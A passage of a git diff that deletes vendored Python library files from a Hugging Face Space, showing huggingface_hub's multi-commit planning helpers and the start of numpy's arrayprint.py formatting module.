TYPE_CHECKING: - from .hf_api import HfApi - - -class MultiCommitException(Exception): - """Base exception for any exception happening while doing a multi-commit.""" - - -MULTI_COMMIT_PR_DESCRIPTION_TEMPLATE = """ -## {commit_message} - -{commit_description} - -**Multi commit ID:** {multi_commit_id} - -Scheduled commits: - -{multi_commit_strategy} - -_This is a PR opened using the `huggingface_hub` library in the context of a multi-commit. PR can be commented as a usual PR. However, please be aware that manually updating the PR description, changing the PR status, or pushing new commits, is not recommended as it might corrupt the commit process. Learn more about multi-commits [in this guide](https://huggingface.co/docs/huggingface_hub/main/guides/upload)._ -""" - -MULTI_COMMIT_PR_COMPLETION_COMMENT_TEMPLATE = """ -Multi-commit is now completed! You can ping the repo owner to review the changes. This PR can now be commented or modified without risking to corrupt it. - -_This is a comment posted using the `huggingface_hub` library in the context of a multi-commit. Learn more about multi-commits [in this guide](https://huggingface.co/docs/huggingface_hub/main/guides/upload)._ -""" - -MULTI_COMMIT_PR_CLOSING_COMMENT_TEMPLATE = """ -`create_pr=False` has been passed so PR is automatically merged. - -_This is a comment posted using the `huggingface_hub` library in the context of a multi-commit. Learn more about multi-commits [in this guide](https://huggingface.co/docs/huggingface_hub/main/guides/upload)._ -""" - -MULTI_COMMIT_PR_CLOSE_COMMENT_FAILURE_NO_CHANGES_TEMPLATE = """ -Cannot merge Pull Requests as no changes are associated. This PR will be closed automatically. - -_This is a comment posted using the `huggingface_hub` library in the context of a multi-commit. Learn more about multi-commits [in this guide](https://huggingface.co/docs/huggingface_hub/main/guides/upload)._ -""" - -MULTI_COMMIT_PR_CLOSE_COMMENT_FAILURE_BAD_REQUEST_TEMPLATE = """ -An error occurred while trying to merge the Pull Request: `{error_message}`. - -_This is a comment posted using the `huggingface_hub` library in the context of a multi-commit. Learn more about multi-commits [in this guide](https://huggingface.co/docs/huggingface_hub/main/guides/upload)._ -""" - - -STEP_ID_REGEX = re.compile(r"- \[(?P[ |x])\].*(?P[a-fA-F0-9]{64})", flags=re.MULTILINE) - - -@experimental -def plan_multi_commits( - operations: Iterable[Union[CommitOperationAdd, CommitOperationDelete]], - max_operations_per_commit: int = 50, - max_upload_size_per_commit: int = 2 * 1024 * 1024 * 1024, -) -> Tuple[List[List[CommitOperationAdd]], List[List[CommitOperationDelete]]]: - """Split a list of operations in a list of commits to perform. - - Implementation follows a sub-optimal (yet simple) algorithm: - 1. Delete operations are grouped together by commits of maximum `max_operations_per_commits` operations. - 2. All additions exceeding `max_upload_size_per_commit` are committed 1 by 1. - 3. All remaining additions are grouped together and split each time the `max_operations_per_commit` or the - `max_upload_size_per_commit` limit is reached. - - We do not try to optimize the splitting to get the lowest number of commits as this is a NP-hard problem (see - [bin packing problem](https://en.wikipedia.org/wiki/Bin_packing_problem)). For our use case, it is not problematic - to use a sub-optimal solution so we favored an easy-to-explain implementation. - - Args: - operations (`List` of [`~hf_api.CommitOperation`]): - The list of operations to split into commits. - max_operations_per_commit (`int`): - Maximum number of operations in a single commit. Defaults to 50. - max_upload_size_per_commit (`int`): - Maximum size to upload (in bytes) in a single commit. Defaults to 2GB. Files bigger than this limit are - uploaded, 1 per commit. - - Returns: - `Tuple[List[List[CommitOperationAdd]], List[List[CommitOperationDelete]]]`: a tuple. First item is a list of - lists of [`CommitOperationAdd`] representing the addition commits to push. The second item is a list of lists - of [`CommitOperationDelete`] representing the deletion commits. - - - - `plan_multi_commits` is experimental. Its API and behavior is subject to change in the future without prior notice. - - - - Example: - ```python - >>> from huggingface_hub import HfApi, plan_multi_commits - >>> addition_commits, deletion_commits = plan_multi_commits( - ... operations=[ - ... CommitOperationAdd(...), - ... CommitOperationAdd(...), - ... CommitOperationDelete(...), - ... CommitOperationDelete(...), - ... CommitOperationAdd(...), - ... ], - ... ) - >>> HfApi().create_commits_on_pr( - ... repo_id="my-cool-model", - ... addition_commits=addition_commits, - ... deletion_commits=deletion_commits, - ... (...) - ... verbose=True, - ... ) - ``` - - - - The initial order of the operations is not guaranteed! All deletions will be performed before additions. If you are - not updating multiple times the same file, you are fine. - - - """ - addition_commits: List[List[CommitOperationAdd]] = [] - deletion_commits: List[List[CommitOperationDelete]] = [] - - additions: List[CommitOperationAdd] = [] - additions_size = 0 - deletions: List[CommitOperationDelete] = [] - for op in operations: - if isinstance(op, CommitOperationDelete): - # Group delete operations together - deletions.append(op) - if len(deletions) >= max_operations_per_commit: - deletion_commits.append(deletions) - deletions = [] - - elif op.upload_info.size >= max_upload_size_per_commit: - # Upload huge files 1 by 1 - addition_commits.append([op]) - - elif additions_size + op.upload_info.size < max_upload_size_per_commit: - # Group other additions and split if size limit is reached (either max_nb_files or max_upload_size) - additions.append(op) - additions_size += op.upload_info.size - - else: - addition_commits.append(additions) - additions = [op] - additions_size = op.upload_info.size - - if len(additions) >= max_operations_per_commit: - addition_commits.append(additions) - additions = [] - additions_size = 0 - - if len(additions) > 0: - addition_commits.append(additions) - if len(deletions) > 0: - deletion_commits.append(deletions) - - return addition_commits, deletion_commits - - -@dataclass -class MultiCommitStep: - """Dataclass containing a list of CommitOperation to commit at once. - - A [`MultiCommitStep`] is one atomic part of a [`MultiCommitStrategy`]. Each step is identified by its own - deterministic ID based on the list of commit operations (hexadecimal sha256). ID is persistent between re-runs if - the list of commits is kept the same. - """ - - operations: List[Union[CommitOperationAdd, CommitOperationDelete]] - - id: str = field(init=False) - completed: bool = False - - def __post_init__(self) -> None: - if len(self.operations) == 0: - raise ValueError("A MultiCommitStep must have at least 1 commit operation, got 0.") - - # Generate commit id - sha = sha256() - for op in self.operations: - if isinstance(op, CommitOperationAdd): - sha.update(b"ADD") - sha.update(op.path_in_repo.encode()) - sha.update(op.upload_info.sha256) - elif isinstance(op, CommitOperationDelete): - sha.update(b"DELETE") - sha.update(op.path_in_repo.encode()) - sha.update(str(op.is_folder).encode()) - else: - NotImplementedError() - self.id = sha.hexdigest() - - def __str__(self) -> str: - """Format a step for PR description. - - Formatting can be changed in the future as long as it is single line, starts with `- [ ]`/`- [x]` and contains - `self.id`. Must be able to match `STEP_ID_REGEX`. - """ - additions = [op for op in self.operations if isinstance(op, CommitOperationAdd)] - file_deletions = [op for op in self.operations if isinstance(op, CommitOperationDelete) and not op.is_folder] - folder_deletions = [op for op in self.operations if isinstance(op, CommitOperationDelete) and op.is_folder] - if len(additions) > 0: - return ( - f"- [{'x' if self.completed else ' '}] Upload {len(additions)} file(s) " - f"totalling {_format_size(sum(add.upload_info.size for add in additions))}" - f" ({self.id})" - ) - else: - return ( - f"- [{'x' if self.completed else ' '}] Delete {len(file_deletions)} file(s) and" - f" {len(folder_deletions)} folder(s) ({self.id})" - ) - - -@dataclass -class MultiCommitStrategy: - """Dataclass containing a list of [`MultiCommitStep`] to commit iteratively. - - A strategy is identified by its own deterministic ID based on the list of its steps (hexadecimal sha256). ID is - persistent between re-runs if the list of commits is kept the same. - """ - - addition_commits: List[MultiCommitStep] - deletion_commits: List[MultiCommitStep] - - id: str = field(init=False) - all_steps: Set[str] = field(init=False) - - def __post_init__(self) -> None: - self.all_steps = {step.id for step in self.addition_commits + self.deletion_commits} - if len(self.all_steps) < len(self.addition_commits) + len(self.deletion_commits): - raise ValueError("Got duplicate commits in MultiCommitStrategy. All commits must be unique.") - - if len(self.all_steps) == 0: - raise ValueError("A MultiCommitStrategy must have at least 1 commit, got 0.") - - # Generate strategy id - sha = sha256() - for step in self.addition_commits + self.deletion_commits: - sha.update("new step".encode()) - sha.update(step.id.encode()) - self.id = sha.hexdigest() - - -def multi_commit_create_pull_request( - api: "HfApi", - repo_id: str, - commit_message: str, - commit_description: Optional[str], - strategy: MultiCommitStrategy, - token: Optional[str], - repo_type: Optional[str], -) -> DiscussionWithDetails: - return api.create_pull_request( - repo_id=repo_id, - title=f"[WIP] {commit_message} (multi-commit {strategy.id})", - description=multi_commit_generate_comment( - commit_message=commit_message, commit_description=commit_description, strategy=strategy - ), - token=token, - repo_type=repo_type, - ) - - -def multi_commit_generate_comment( - commit_message: str, - commit_description: Optional[str], - strategy: MultiCommitStrategy, -) -> str: - return MULTI_COMMIT_PR_DESCRIPTION_TEMPLATE.format( - commit_message=commit_message, - commit_description=commit_description or "", - multi_commit_id=strategy.id, - multi_commit_strategy="\n".join( - str(commit) for commit in strategy.deletion_commits + strategy.addition_commits - ), - ) - - -def multi_commit_parse_pr_description(description: str) -> Set[str]: - return {match[1] for match in STEP_ID_REGEX.findall(description)} diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/core/arrayprint.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/core/arrayprint.py deleted file mode 100644 index 62cd527073a615458b12619545f4da76664c4bc0..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/core/arrayprint.py +++ /dev/null @@ -1,1725 +0,0 @@ -"""Array printing function - -$Id: arrayprint.py,v 1.9 2005/09/13 13:58:44 teoliphant Exp $ - -""" -__all__ = ["array2string", "array_str", "array_repr", "set_string_function", - "set_printoptions", "get_printoptions", "printoptions", - "format_float_positional", "format_float_scientific"] -__docformat__ = 'restructuredtext' - -# -# Written by Konrad Hinsen -# last revision: 1996-3-13 -# modified by Jim Hugunin 1997-3-3 for repr's and str's (and other details) -# and by Perry Greenfield 2000-4-1 for numarray -# and by Travis Oliphant 2005-8-22 for numpy - - -# Note: Both scalartypes.c.src and arrayprint.py implement strs for numpy -# scalars but for different purposes. scalartypes.c.src has str/reprs for when -# the scalar is printed on its own, while arrayprint.py has strs for when -# scalars are printed inside an ndarray. Only the latter strs are currently -# user-customizable. - -import functools -import numbers -import sys -try: - from _thread import get_ident -except ImportError: - from _dummy_thread import get_ident - -import numpy as np -from . import numerictypes as _nt -from .umath import absolute, isinf, isfinite, isnat -from . import multiarray -from .multiarray import (array, dragon4_positional, dragon4_scientific, - datetime_as_string, datetime_data, ndarray, - set_legacy_print_mode) -from .fromnumeric import any -from .numeric import concatenate, asarray, errstate -from .numerictypes import (longlong, intc, int_, float_, complex_, bool_, - flexible) -from .overrides import array_function_dispatch, set_module -import operator -import warnings -import contextlib - -_format_options = { - 'edgeitems': 3, # repr N leading and trailing items of each dimension - 'threshold': 1000, # total items > triggers array summarization - 'floatmode': 'maxprec', - 'precision': 8, # precision of floating point representations - 'suppress': False, # suppress printing small floating values in exp format - 'linewidth': 75, - 'nanstr': 'nan', - 'infstr': 'inf', - 'sign': '-', - 'formatter': None, - # Internally stored as an int to simplify comparisons; converted from/to - # str/False on the way in/out. - 'legacy': sys.maxsize} - -def _make_options_dict(precision=None, threshold=None, edgeitems=None, - linewidth=None, suppress=None, nanstr=None, infstr=None, - sign=None, formatter=None, floatmode=None, legacy=None): - """ - Make a dictionary out of the non-None arguments, plus conversion of - *legacy* and sanity checks. - """ - - options = {k: v for k, v in locals().items() if v is not None} - - if suppress is not None: - options['suppress'] = bool(suppress) - - modes = ['fixed', 'unique', 'maxprec', 'maxprec_equal'] - if floatmode not in modes + [None]: - raise ValueError("floatmode option must be one of " + - ", ".join('"{}"'.format(m) for m in modes)) - - if sign not in [None, '-', '+', ' ']: - raise ValueError("sign option must be one of ' ', '+', or '-'") - - if legacy == False: - options['legacy'] = sys.maxsize - elif legacy == '1.13': - options['legacy'] = 113 - elif legacy == '1.21': - options['legacy'] = 121 - elif legacy is None: - pass # OK, do nothing. - else: - warnings.warn( - "legacy printing option can currently only be '1.13', '1.21', or " - "`False`", stacklevel=3) - - if threshold is not None: - # forbid the bad threshold arg suggested by stack overflow, gh-12351 - if not isinstance(threshold, numbers.Number): - raise TypeError("threshold must be numeric") - if np.isnan(threshold): - raise ValueError("threshold must be non-NAN, try " - "sys.maxsize for untruncated representation") - - if precision is not None: - # forbid the bad precision arg as suggested by issue #18254 - try: - options['precision'] = operator.index(precision) - except TypeError as e: - raise TypeError('precision must be an integer') from e - - return options - - -@set_module('numpy') -def set_printoptions(precision=None, threshold=None, edgeitems=None, - linewidth=None, suppress=None, nanstr=None, infstr=None, - formatter=None, sign=None, floatmode=None, *, legacy=None): - """ - Set printing options. - - These options determine the way floating point numbers, arrays and - other NumPy objects are displayed. - - Parameters - ---------- - precision : int or None, optional - Number of digits of precision for floating point output (default 8). - May be None if `floatmode` is not `fixed`, to print as many digits as - necessary to uniquely specify the value. - threshold : int, optional - Total number of array elements which trigger summarization - rather than full repr (default 1000). - To always use the full repr without summarization, pass `sys.maxsize`. - edgeitems : int, optional - Number of array items in summary at beginning and end of - each dimension (default 3). - linewidth : int, optional - The number of characters per line for the purpose of inserting - line breaks (default 75). - suppress : bool, optional - If True, always print floating point numbers using fixed point - notation, in which case numbers equal to zero in the current precision - will print as zero. If False, then scientific notation is used when - absolute value of the smallest number is < 1e-4 or the ratio of the - maximum absolute value to the minimum is > 1e3. The default is False. - nanstr : str, optional - String representation of floating point not-a-number (default nan). - infstr : str, optional - String representation of floating point infinity (default inf). - sign : string, either '-', '+', or ' ', optional - Controls printing of the sign of floating-point types. If '+', always - print the sign of positive values. If ' ', always prints a space - (whitespace character) in the sign position of positive values. If - '-', omit the sign character of positive values. (default '-') - formatter : dict of callables, optional - If not None, the keys should indicate the type(s) that the respective - formatting function applies to. Callables should return a string. - Types that are not specified (by their corresponding keys) are handled - by the default formatters. Individual types for which a formatter - can be set are: - - - 'bool' - - 'int' - - 'timedelta' : a `numpy.timedelta64` - - 'datetime' : a `numpy.datetime64` - - 'float' - - 'longfloat' : 128-bit floats - - 'complexfloat' - - 'longcomplexfloat' : composed of two 128-bit floats - - 'numpystr' : types `numpy.bytes_` and `numpy.str_` - - 'object' : `np.object_` arrays - - Other keys that can be used to set a group of types at once are: - - - 'all' : sets all types - - 'int_kind' : sets 'int' - - 'float_kind' : sets 'float' and 'longfloat' - - 'complex_kind' : sets 'complexfloat' and 'longcomplexfloat' - - 'str_kind' : sets 'numpystr' - floatmode : str, optional - Controls the interpretation of the `precision` option for - floating-point types. Can take the following values - (default maxprec_equal): - - * 'fixed': Always print exactly `precision` fractional digits, - even if this would print more or fewer digits than - necessary to specify the value uniquely. - * 'unique': Print the minimum number of fractional digits necessary - to represent each value uniquely. Different elements may - have a different number of digits. The value of the - `precision` option is ignored. - * 'maxprec': Print at most `precision` fractional digits, but if - an element can be uniquely represented with fewer digits - only print it with that many. - * 'maxprec_equal': Print at most `precision` fractional digits, - but if every element in the array can be uniquely - represented with an equal number of fewer digits, use that - many digits for all elements. - legacy : string or `False`, optional - If set to the string `'1.13'` enables 1.13 legacy printing mode. This - approximates numpy 1.13 print output by including a space in the sign - position of floats and different behavior for 0d arrays. This also - enables 1.21 legacy printing mode (described below). - - If set to the string `'1.21'` enables 1.21 legacy printing mode. This - approximates numpy 1.21 print output of complex structured dtypes - by not inserting spaces after commas that separate fields and after - colons. - - If set to `False`, disables legacy mode. - - Unrecognized strings will be ignored with a warning for forward - compatibility. - - .. versionadded:: 1.14.0 - .. versionchanged:: 1.22.0 - - See Also - -------- - get_printoptions, printoptions, set_string_function, array2string - - Notes - ----- - `formatter` is always reset with a call to `set_printoptions`. - - Use `printoptions` as a context manager to set the values temporarily. - - Examples - -------- - Floating point precision can be set: - - >>> np.set_printoptions(precision=4) - >>> np.array([1.123456789]) - [1.1235] - - Long arrays can be summarised: - - >>> np.set_printoptions(threshold=5) - >>> np.arange(10) - array([0, 1, 2, ..., 7, 8, 9]) - - Small results can be suppressed: - - >>> eps = np.finfo(float).eps - >>> x = np.arange(4.) - >>> x**2 - (x + eps)**2 - array([-4.9304e-32, -4.4409e-16, 0.0000e+00, 0.0000e+00]) - >>> np.set_printoptions(suppress=True) - >>> x**2 - (x + eps)**2 - array([-0., -0., 0., 0.]) - - A custom formatter can be used to display array elements as desired: - - >>> np.set_printoptions(formatter={'all':lambda x: 'int: '+str(-x)}) - >>> x = np.arange(3) - >>> x - array([int: 0, int: -1, int: -2]) - >>> np.set_printoptions() # formatter gets reset - >>> x - array([0, 1, 2]) - - To put back the default options, you can use: - - >>> np.set_printoptions(edgeitems=3, infstr='inf', - ... linewidth=75, nanstr='nan', precision=8, - ... suppress=False, threshold=1000, formatter=None) - - Also to temporarily override options, use `printoptions` as a context manager: - - >>> with np.printoptions(precision=2, suppress=True, threshold=5): - ... np.linspace(0, 10, 10) - array([ 0. , 1.11, 2.22, ..., 7.78, 8.89, 10. ]) - - """ - opt = _make_options_dict(precision, threshold, edgeitems, linewidth, - suppress, nanstr, infstr, sign, formatter, - floatmode, legacy) - # formatter is always reset - opt['formatter'] = formatter - _format_options.update(opt) - - # set the C variable for legacy mode - if _format_options['legacy'] == 113: - set_legacy_print_mode(113) - # reset the sign option in legacy mode to avoid confusion - _format_options['sign'] = '-' - elif _format_options['legacy'] == 121: - set_legacy_print_mode(121) - elif _format_options['legacy'] == sys.maxsize: - set_legacy_print_mode(0) - - -@set_module('numpy') -def get_printoptions(): - """ - Return the current print options. - - Returns - ------- - print_opts : dict - Dictionary of current print options with keys - - - precision : int - - threshold : int - - edgeitems : int - - linewidth : int - - suppress : bool - - nanstr : str - - infstr : str - - formatter : dict of callables - - sign : str - - For a full description of these options, see `set_printoptions`. - - See Also - -------- - set_printoptions, printoptions, set_string_function - - """ - opts = _format_options.copy() - opts['legacy'] = { - 113: '1.13', 121: '1.21', sys.maxsize: False, - }[opts['legacy']] - return opts - - -def _get_legacy_print_mode(): - """Return the legacy print mode as an int.""" - return _format_options['legacy'] - - -@set_module('numpy') -@contextlib.contextmanager -def printoptions(*args, **kwargs): - """Context manager for setting print options. - - Set print options for the scope of the `with` block, and restore the old - options at the end. See `set_printoptions` for the full description of - available options. - - Examples - -------- - - >>> from numpy.testing import assert_equal - >>> with np.printoptions(precision=2): - ... np.array([2.0]) / 3 - array([0.67]) - - The `as`-clause of the `with`-statement gives the current print options: - - >>> with np.printoptions(precision=2) as opts: - ... assert_equal(opts, np.get_printoptions()) - - See Also - -------- - set_printoptions, get_printoptions - - """ - opts = np.get_printoptions() - try: - np.set_printoptions(*args, **kwargs) - yield np.get_printoptions() - finally: - np.set_printoptions(**opts) - - -def _leading_trailing(a, edgeitems, index=()): - """ - Keep only the N-D corners (leading and trailing edges) of an array. - - Should be passed a base-class ndarray, since it makes no guarantees about - preserving subclasses. - """ - axis = len(index) - if axis == a.ndim: - return a[index] - - if a.shape[axis] > 2*edgeitems: - return concatenate(( - _leading_trailing(a, edgeitems, index + np.index_exp[ :edgeitems]), - _leading_trailing(a, edgeitems, index + np.index_exp[-edgeitems:]) - ), axis=axis) - else: - return _leading_trailing(a, edgeitems, index + np.index_exp[:]) - - -def _object_format(o): - """ Object arrays containing lists should be printed unambiguously """ - if type(o) is list: - fmt = 'list({!r})' - else: - fmt = '{!r}' - return fmt.format(o) - -def repr_format(x): - return repr(x) - -def str_format(x): - return str(x) - -def _get_formatdict(data, *, precision, floatmode, suppress, sign, legacy, - formatter, **kwargs): - # note: extra arguments in kwargs are ignored - - # wrapped in lambdas to avoid taking a code path with the wrong type of data - formatdict = { - 'bool': lambda: BoolFormat(data), - 'int': lambda: IntegerFormat(data), - 'float': lambda: FloatingFormat( - data, precision, floatmode, suppress, sign, legacy=legacy), - 'longfloat': lambda: FloatingFormat( - data, precision, floatmode, suppress, sign, legacy=legacy), - 'complexfloat': lambda: ComplexFloatingFormat( - data, precision, floatmode, suppress, sign, legacy=legacy), - 'longcomplexfloat': lambda: ComplexFloatingFormat( - data, precision, floatmode, suppress, sign, legacy=legacy), - 'datetime': lambda: DatetimeFormat(data, legacy=legacy), - 'timedelta': lambda: TimedeltaFormat(data), - 'object': lambda: _object_format, - 'void': lambda: str_format, - 'numpystr': lambda: repr_format} - - # we need to wrap values in `formatter` in a lambda, so that the interface - # is the same as the above values. - def indirect(x): - return lambda: x - - if formatter is not None: - fkeys = [k for k in formatter.keys() if formatter[k] is not None] - if 'all' in fkeys: - for key in formatdict.keys(): - formatdict[key] = indirect(formatter['all']) - if 'int_kind' in fkeys: - for key in ['int']: - formatdict[key] = indirect(formatter['int_kind']) - if 'float_kind' in fkeys: - for key in ['float', 'longfloat']: - formatdict[key] = indirect(formatter['float_kind']) - if 'complex_kind' in fkeys: - for key in ['complexfloat', 'longcomplexfloat']: - formatdict[key] = indirect(formatter['complex_kind']) - if 'str_kind' in fkeys: - formatdict['numpystr'] = indirect(formatter['str_kind']) - for key in formatdict.keys(): - if key in fkeys: - formatdict[key] = indirect(formatter[key]) - - return formatdict - -def _get_format_function(data, **options): - """ - find the right formatting function for the dtype_ - """ - dtype_ = data.dtype - dtypeobj = dtype_.type - formatdict = _get_formatdict(data, **options) - if dtypeobj is None: - return formatdict["numpystr"]() - elif issubclass(dtypeobj, _nt.bool_): - return formatdict['bool']() - elif issubclass(dtypeobj, _nt.integer): - if issubclass(dtypeobj, _nt.timedelta64): - return formatdict['timedelta']() - else: - return formatdict['int']() - elif issubclass(dtypeobj, _nt.floating): - if issubclass(dtypeobj, _nt.longfloat): - return formatdict['longfloat']() - else: - return formatdict['float']() - elif issubclass(dtypeobj, _nt.complexfloating): - if issubclass(dtypeobj, _nt.clongfloat): - return formatdict['longcomplexfloat']() - else: - return formatdict['complexfloat']() - elif issubclass(dtypeobj, (_nt.str_, _nt.bytes_)): - return formatdict['numpystr']() - elif issubclass(dtypeobj, _nt.datetime64): - return formatdict['datetime']() - elif issubclass(dtypeobj, _nt.object_): - return formatdict['object']() - elif issubclass(dtypeobj, _nt.void): - if dtype_.names is not None: - return StructuredVoidFormat.from_data(data, **options) - else: - return formatdict['void']() - else: - return formatdict['numpystr']() - - -def _recursive_guard(fillvalue='...'): - """ - Like the python 3.2 reprlib.recursive_repr, but forwards *args and **kwargs - - Decorates a function such that if it calls itself with the same first - argument, it returns `fillvalue` instead of recursing. - - Largely copied from reprlib.recursive_repr - """ - - def decorating_function(f): - repr_running = set() - - @functools.wraps(f) - def wrapper(self, *args, **kwargs): - key = id(self), get_ident() - if key in repr_running: - return fillvalue - repr_running.add(key) - try: - return f(self, *args, **kwargs) - finally: - repr_running.discard(key) - - return wrapper - - return decorating_function - - -# gracefully handle recursive calls, when object arrays contain themselves -@_recursive_guard() -def _array2string(a, options, separator=' ', prefix=""): - # The formatter __init__s in _get_format_function cannot deal with - # subclasses yet, and we also need to avoid recursion issues in - # _formatArray with subclasses which return 0d arrays in place of scalars - data = asarray(a) - if a.shape == (): - a = data - - if a.size > options['threshold']: - summary_insert = "..." - data = _leading_trailing(data, options['edgeitems']) - else: - summary_insert = "" - - # find the right formatting function for the array - format_function = _get_format_function(data, **options) - - # skip over "[" - next_line_prefix = " " - # skip over array( - next_line_prefix += " "*len(prefix) - - lst = _formatArray(a, format_function, options['linewidth'], - next_line_prefix, separator, options['edgeitems'], - summary_insert, options['legacy']) - return lst - - -def _array2string_dispatcher( - a, max_line_width=None, precision=None, - suppress_small=None, separator=None, prefix=None, - style=None, formatter=None, threshold=None, - edgeitems=None, sign=None, floatmode=None, suffix=None, - *, legacy=None): - return (a,) - - -@array_function_dispatch(_array2string_dispatcher, module='numpy') -def array2string(a, max_line_width=None, precision=None, - suppress_small=None, separator=' ', prefix="", - style=np._NoValue, formatter=None, threshold=None, - edgeitems=None, sign=None, floatmode=None, suffix="", - *, legacy=None): - """ - Return a string representation of an array. - - Parameters - ---------- - a : ndarray - Input array. - max_line_width : int, optional - Inserts newlines if text is longer than `max_line_width`. - Defaults to ``numpy.get_printoptions()['linewidth']``. - precision : int or None, optional - Floating point precision. - Defaults to ``numpy.get_printoptions()['precision']``. - suppress_small : bool, optional - Represent numbers "very close" to zero as zero; default is False. - Very close is defined by precision: if the precision is 8, e.g., - numbers smaller (in absolute value) than 5e-9 are represented as - zero. - Defaults to ``numpy.get_printoptions()['suppress']``. - separator : str, optional - Inserted between elements. - prefix : str, optional - suffix : str, optional - The length of the prefix and suffix strings are used to respectively - align and wrap the output. An array is typically printed as:: - - prefix + array2string(a) + suffix - - The output is left-padded by the length of the prefix string, and - wrapping is forced at the column ``max_line_width - len(suffix)``. - It should be noted that the content of prefix and suffix strings are - not included in the output. - style : _NoValue, optional - Has no effect, do not use. - - .. deprecated:: 1.14.0 - formatter : dict of callables, optional - If not None, the keys should indicate the type(s) that the respective - formatting function applies to. Callables should return a string. - Types that are not specified (by their corresponding keys) are handled - by the default formatters. Individual types for which a formatter - can be set are: - - - 'bool' - - 'int' - - 'timedelta' : a `numpy.timedelta64` - - 'datetime' : a `numpy.datetime64` - - 'float' - - 'longfloat' : 128-bit floats - - 'complexfloat' - - 'longcomplexfloat' : composed of two 128-bit floats - - 'void' : type `numpy.void` - - 'numpystr' : types `numpy.bytes_` and `numpy.str_` - - Other keys that can be used to set a group of types at once are: - - - 'all' : sets all types - - 'int_kind' : sets 'int' - - 'float_kind' : sets 'float' and 'longfloat' - - 'complex_kind' : sets 'complexfloat' and 'longcomplexfloat' - - 'str_kind' : sets 'numpystr' - threshold : int, optional - Total number of array elements which trigger summarization - rather than full repr. - Defaults to ``numpy.get_printoptions()['threshold']``. - edgeitems : int, optional - Number of array items in summary at beginning and end of - each dimension. - Defaults to ``numpy.get_printoptions()['edgeitems']``. - sign : string, either '-', '+', or ' ', optional - Controls printing of the sign of floating-point types. If '+', always - print the sign of positive values. If ' ', always prints a space - (whitespace character) in the sign position of positive values. If - '-', omit the sign character of positive values. - Defaults to ``numpy.get_printoptions()['sign']``. - floatmode : str, optional - Controls the interpretation of the `precision` option for - floating-point types. - Defaults to ``numpy.get_printoptions()['floatmode']``. - Can take the following values: - - - 'fixed': Always print exactly `precision` fractional digits, - even if this would print more or fewer digits than - necessary to specify the value uniquely. - - 'unique': Print the minimum number of fractional digits necessary - to represent each value uniquely. Different elements may - have a different number of digits. The value of the - `precision` option is ignored. - - 'maxprec': Print at most `precision` fractional digits, but if - an element can be uniquely represented with fewer digits - only print it with that many. - - 'maxprec_equal': Print at most `precision` fractional digits, - but if every element in the array can be uniquely - represented with an equal number of fewer digits, use that - many digits for all elements. - legacy : string or `False`, optional - If set to the string `'1.13'` enables 1.13 legacy printing mode. This - approximates numpy 1.13 print output by including a space in the sign - position of floats and different behavior for 0d arrays. If set to - `False`, disables legacy mode. Unrecognized strings will be ignored - with a warning for forward compatibility. - - .. versionadded:: 1.14.0 - - Returns - ------- - array_str : str - String representation of the array. - - Raises - ------ - TypeError - if a callable in `formatter` does not return a string. - - See Also - -------- - array_str, array_repr, set_printoptions, get_printoptions - - Notes - ----- - If a formatter is specified for a certain type, the `precision` keyword is - ignored for that type. - - This is a very flexible function; `array_repr` and `array_str` are using - `array2string` internally so keywords with the same name should work - identically in all three functions. - - Examples - -------- - >>> x = np.array([1e-16,1,2,3]) - >>> np.array2string(x, precision=2, separator=',', - ... suppress_small=True) - '[0.,1.,2.,3.]' - - >>> x = np.arange(3.) - >>> np.array2string(x, formatter={'float_kind':lambda x: "%.2f" % x}) - '[0.00 1.00 2.00]' - - >>> x = np.arange(3) - >>> np.array2string(x, formatter={'int':lambda x: hex(x)}) - '[0x0 0x1 0x2]' - - """ - - overrides = _make_options_dict(precision, threshold, edgeitems, - max_line_width, suppress_small, None, None, - sign, formatter, floatmode, legacy) - options = _format_options.copy() - options.update(overrides) - - if options['legacy'] <= 113: - if style is np._NoValue: - style = repr - - if a.shape == () and a.dtype.names is None: - return style(a.item()) - elif style is not np._NoValue: - # Deprecation 11-9-2017 v1.14 - warnings.warn("'style' argument is deprecated and no longer functional" - " except in 1.13 'legacy' mode", - DeprecationWarning, stacklevel=2) - - if options['legacy'] > 113: - options['linewidth'] -= len(suffix) - - # treat as a null array if any of shape elements == 0 - if a.size == 0: - return "[]" - - return _array2string(a, options, separator, prefix) - - -def _extendLine(s, line, word, line_width, next_line_prefix, legacy): - needs_wrap = len(line) + len(word) > line_width - if legacy > 113: - # don't wrap lines if it won't help - if len(line) <= len(next_line_prefix): - needs_wrap = False - - if needs_wrap: - s += line.rstrip() + "\n" - line = next_line_prefix - line += word - return s, line - - -def _extendLine_pretty(s, line, word, line_width, next_line_prefix, legacy): - """ - Extends line with nicely formatted (possibly multi-line) string ``word``. - """ - words = word.splitlines() - if len(words) == 1 or legacy <= 113: - return _extendLine(s, line, word, line_width, next_line_prefix, legacy) - - max_word_length = max(len(word) for word in words) - if (len(line) + max_word_length > line_width and - len(line) > len(next_line_prefix)): - s += line.rstrip() + '\n' - line = next_line_prefix + words[0] - indent = next_line_prefix - else: - indent = len(line)*' ' - line += words[0] - - for word in words[1::]: - s += line.rstrip() + '\n' - line = indent + word - - suffix_length = max_word_length - len(words[-1]) - line += suffix_length*' ' - - return s, line - -def _formatArray(a, format_function, line_width, next_line_prefix, - separator, edge_items, summary_insert, legacy): - """formatArray is designed for two modes of operation: - - 1. Full output - - 2. Summarized output - - """ - def recurser(index, hanging_indent, curr_width): - """ - By using this local function, we don't need to recurse with all the - arguments. Since this function is not created recursively, the cost is - not significant - """ - axis = len(index) - axes_left = a.ndim - axis - - if axes_left == 0: - return format_function(a[index]) - - # when recursing, add a space to align with the [ added, and reduce the - # length of the line by 1 - next_hanging_indent = hanging_indent + ' ' - if legacy <= 113: - next_width = curr_width - else: - next_width = curr_width - len(']') - - a_len = a.shape[axis] - show_summary = summary_insert and 2*edge_items < a_len - if show_summary: - leading_items = edge_items - trailing_items = edge_items - else: - leading_items = 0 - trailing_items = a_len - - # stringify the array with the hanging indent on the first line too - s = '' - - # last axis (rows) - wrap elements if they would not fit on one line - if axes_left == 1: - # the length up until the beginning of the separator / bracket - if legacy <= 113: - elem_width = curr_width - len(separator.rstrip()) - else: - elem_width = curr_width - max(len(separator.rstrip()), len(']')) - - line = hanging_indent - for i in range(leading_items): - word = recurser(index + (i,), next_hanging_indent, next_width) - s, line = _extendLine_pretty( - s, line, word, elem_width, hanging_indent, legacy) - line += separator - 